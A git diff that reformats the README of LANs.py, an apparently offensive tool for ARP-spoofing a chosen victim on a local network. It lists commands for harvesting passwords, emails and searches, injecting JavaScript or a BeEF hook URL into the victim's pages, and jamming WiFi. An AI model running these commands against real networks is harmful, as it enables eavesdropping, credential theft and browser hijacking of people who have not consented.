diff --git a/README.md b/README.md index cd5aad2..43ab9d2 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,6 @@ If you have any issues running this script I'd suggest checking out [MITMf](https://github.com/byt3bl33d3r/MITMf) which does all the same things + more. Eventually this script needs to be rewritten with net-creds as the engine. -LANs.py -======== +# LANs.py * Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit. * Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself. @@ -9,14 +8,23 @@ LANs.py * Also can be used to continuously jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based off of the strength of your WiFi card. This can be fine-tuned to allow jamming of everyone or even just one client. Cannot jam WiFi and spy simultaneously. -Prerequisites: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (optional), nmap, nbtscan, tcpdump, and a wireless card capable of promiscuous mode if you don't know the IP of your target. - -Tested on Kali. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim. +### Prerequisites: +- Linux
+- `python-scapy`
+- `python-nfqueue` (nfqueue-bindings 0.4-3)
+- `aircrack-ng`
+- `python-twisted`
+- `nmap`
+- `nbtscan`
+- `tcpdump`
+- a wireless card capable of promiscuous mode if you don't know the target's IP address
+- [optional] `BeEf`
+Tested on Kali Linux. In the following examples, 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim. All options: -``` shell +```shell Python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC] [-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n] [-i INTERFACE] [-r REDIRECTTO] [-rip ROUTERIP] @@ -25,41 +33,39 @@ Python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC] [--directedonly] [--accesspoint ACCESSPOINT] ``` -#Usage ------ +### Usage + #### Common usage: - -``` shell +```shell python LANs.py -u -p ``` -Active target identification which ARP spoofs the chosen target and outputs all the interesting non-HTTPS data they send or request. There's no -ip option so this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network. Attempts to tag the targets with a Windows netbios name and prints how many data packets they are sending/receiving. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Ctrl-C when you're ready and pick your target which it will then ARP spoof. +Active target identification which ARP spoofs the chosen target and outputs all the interesting non-HTTPS data they send or request. There's no `-ip` option so this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network. Attempts to tag the targets with a Windows netbios name and prints how many data packets they are sending/receiving. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Ctrl-C when you're ready and pick your target which it will then ARP spoof. -Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol username/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received. Screenshot: http://i.imgur.com/kQofTYP.png +--- -Running LANs.py without argument will give you the list of active targets and upon selecting one, it will act as a simple ARP spoofer. +Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol username/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received. [Screenshot](http://i.imgur.com/kQofTYP.png) -### Another common usage: +Running `LANs.py` without argument will give you the list of active targets and upon selecting one, it will act as a simple ARP spoofer. -``` shell +#### Other common usage: +```shell python LANs.py -u -p -d -ip 192.168.0.10 ``` --d: open an xterm with driftnet to see all images they view - --ip: target this IP address and skip the active targeting at the beginning +`-d`: open an xterm with driftnet to see all images they view
+`-ip`: target this IP address and skip the active targeting at the beginning #### HTML injection: - -``` shell +```shell python LANs.py -b http://192.168.0.5:3000/hook.js ``` -Inject a BeEF hook URL (http://beefproject.com/, tutorial: http://resources.infosecinstitute.com/beef-part-1/) into pages the victim visits. This just wraps the argument in `